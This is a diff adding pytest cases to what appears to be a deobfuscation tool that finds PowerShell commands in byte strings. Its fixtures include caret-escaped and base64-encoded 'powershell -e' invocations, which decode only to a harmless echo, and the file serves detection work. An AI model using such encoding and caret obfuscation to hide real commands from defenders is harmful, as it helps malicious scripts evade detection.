@@ -154,6 +154,18 @@ def test_find_cmd_strings_with_dynamic_cmd(cmd: bytes):
 
 
 # find_powershell_strings
+@pytest.mark.parametrize(
+    "data",
+    [
+        b"",
+        b"supported Powershell version",
+        b"Azure powershell module",
+    ],
+)
+def test_find_powershell_strings_fp(data):
+    assert find_powershell_strings(data) == []
+
+
 def test_find_powershell_strings_enc():
     ex = b"powershell /e ZQBj^AGgAbwAgAGIAZQ^BlAA=="
     assert find_powershell_strings(ex) == [
@@ -177,7 +189,7 @@ def test_find_powershell_strings_enc():
 
 
 def test_find_powershell_strings_enc_with_quotes():
-    ex = b'powershell /e "ZQBjAGgAbwAgAGIAZQBlAA=="'
+    ex = b'powershell/e "ZQBjAGgAbwAgAGIAZQBlAA=="'
     assert find_powershell_strings(ex) == [
         Node(
             type_="shell.powershell",
@@ -189,6 +201,28 @@ def test_find_powershell_strings_enc_with_quotes():
     ]
 
 
+def test_find_powershell_strings_carets():
+    ex = b'    ^p^o^w^e^r^s^h^e^l^l^ ^-^e^ ^"^Z^Q^B^j^A^G^g^A^b^w^A^g^A^G^I^A^Z^Q^B^l^A^A^=^=^"'
+    assert find_powershell_strings(ex) == [
+        Node(
+            type_="shell.cmd",
+            value=b'powershell -e "ZQBjAGgAbwAgAGIAZQBlAA=="',
+            obfuscation="unescape.shell.carets",
+            start=4,
+            end=len(ex),
+            children=[
+                Node(
+                    "shell.powershell",
+                    b"powershell -Command echo bee",
+                    "powershell.base64",
+                    0,
+                    28,
+                )
+            ],
+        )
+    ]
+
+
 def test_find_powershell_for_loop():
     ex = (
         b'for /f "tokens=*" %%a in (\'powershell -Command "hostname '
